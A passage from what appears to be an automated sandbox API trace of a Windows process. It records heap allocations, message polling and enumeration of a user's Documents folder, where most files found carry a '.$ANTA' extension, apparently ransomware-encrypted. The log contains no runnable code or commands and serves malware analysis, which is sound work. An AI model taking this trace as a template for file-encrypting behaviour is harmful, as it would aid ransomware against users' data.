lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0082.461] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0082.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0082.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0082.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0082.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0082.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0082.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0082.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0082.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0082.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0082.461] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0082.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0082.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0082.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0082.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0082.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0082.461] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0082.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0082.462] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0082.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0082.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0082.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae68 [0082.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0082.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0082.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0082.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0082.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0082.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0082.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0082.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0082.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0082.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0082.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0082.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e400 [0082.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0082.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0082.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0082.462] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0082.462] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\*", lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xacbde450, ftCreationTime.dwHighDateTime=0x1d5ecfb, ftLastAccessTime.dwLowDateTime=0xfd4670ca, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfd4670ca, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43caf28, cFileName=".", cAlternateFileName="")) returned 0x41ac180 [0082.462] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xacbde450, ftCreationTime.dwHighDateTime=0x1d5ecfb, ftLastAccessTime.dwLowDateTime=0xfd4670ca, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfd4670ca, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43caf28, cFileName="..", cAlternateFileName="")) returned 1 [0082.462] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144e5a0 | out: lpFindFileData=0x144e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb5be40c0, ftCreationTime.dwHighDateTime=0x1d5eb3b, ftLastAccessTime.dwLowDateTime=0x20013d30, ftLastAccessTime.dwHighDateTime=0x1d5f036, ftLastWriteTime.dwLowDateTime=0x20013d30, ftLastWriteTime.dwHighDateTime=0x1d5f036, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x43caf28, cFileName="-HpKoiMRyoVVCXApKjWd", cAlternateFileName="-HPKOI~1")) returned 1 [0082.462] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0082.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0082.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0082.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0082.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0082.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x431e400 | out: hHeap=0x1780000) returned 1 [0082.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0082.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0082.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0082.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0080 | out: hHeap=0x1780000) returned 1 [0082.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0082.463] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0082.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0082.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0082.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0082.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0082.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0082.463] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0082.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0082.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0082.463] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0082.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0082.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae20 [0082.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0082.463] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0082.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0082.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0082.463] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0082.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0082.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0082.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0082.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0082.464] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0082.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9e90 [0082.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0082.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9e90 | out: hHeap=0x1780000) returned 1 [0082.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0082.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0082.464] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0082.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0082.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0082.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0082.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0082.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0082.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eafd0 | out: hHeap=0x1780000) returned 1 [0082.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0082.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0082.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0082.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0082.464] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0082.464] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0082.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0082.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0082.464] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797008 [0082.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0082.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0082.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0082.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0082.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43918c0 [0082.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0082.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797008 | out: hHeap=0x1780000) returned 1 [0082.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0082.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0082.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0082.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391e70 [0082.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43918c0 | out: hHeap=0x1780000) returned 1 [0082.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0082.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0082.465] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0082.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0082.465] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0082.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0082.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0082.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0082.465] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0082.465] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc0bc49f, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfc0bc49f, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfc15455e, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x6710, dwReserved0=0xdf08b8, dwReserved1=0x8, cFileName="244Ql-yOIaa.pps.$ANTA", cAlternateFileName="244QL-~1.$AN")) returned 1 [0082.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0082.465] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0082.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0082.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0082.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0082.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0082.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0082.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0082.466] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0082.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e95f0 [0082.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0082.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e95f0 | out: hHeap=0x1780000) returned 1 [0082.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0082.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0082.466] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ae0 [0082.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0082.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0082.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0082.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0082.466] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0082.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0082.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0082.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a20 | out: hHeap=0x1780000) returned 1 [0082.466] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0082.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0082.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0082.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0082.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cadc0 [0082.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caee0 [0082.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0082.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0082.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0082.467] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.467] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2af0 [0082.467] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2af0 | out: hHeap=0x1780000) returned 1 [0082.467] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0082.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0082.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0082.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0082.499] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0082.499] FindNextFileW (in: hFindFile=0x41ac180, lpFindFileData=0x144e588 | out: lpFindFileData=0x144e588*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc2d1dc2, ftCreationTime.dwHighDateTime=0x1d69b3e, ftLastAccessTime.dwLowDateTime=0xfc2d1dc2, ftLastAccessTime.dwHighDateTime=0x1d69b3e, ftLastWriteTime.dwLowDateTime=0xfc36a68a, ftLastWriteTime.dwHighDateTime=0x1d69b3e, nFileSizeHigh=0x0, nFileSizeLow=0x2770, dwReserved0=0x144ea80, dwReserved1=0x8, cFileName="5R 2.rtf.$ANTA", cAlternateFileName="5R2RTF~1.$AN")) returned 1 [0082.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadc0 [0082.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0082.499] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0082.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0082.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0082.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0082.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe28 | out: hHeap=0x1780000) returned 1 [0082.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0082.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadc0 | out: hHeap=0x1780000) returned 1 [0082.500] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0082.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea2e0 [0082.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a90 [0082.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea2e0 | out: hHeap=0x1780000) returned 1 [0082.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0082.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0082.500] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0082.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0082.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0082.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0082.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0082.500] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0082.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0082.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0082.500] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0082.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0082.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0082.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0082.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0082.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cae80 [0082.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caee0 [0082.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0082.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0082.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff90 | out: hHeap=0x1780000) returned 1 [0082.501] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0082.501] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0082.501] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0082.501] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 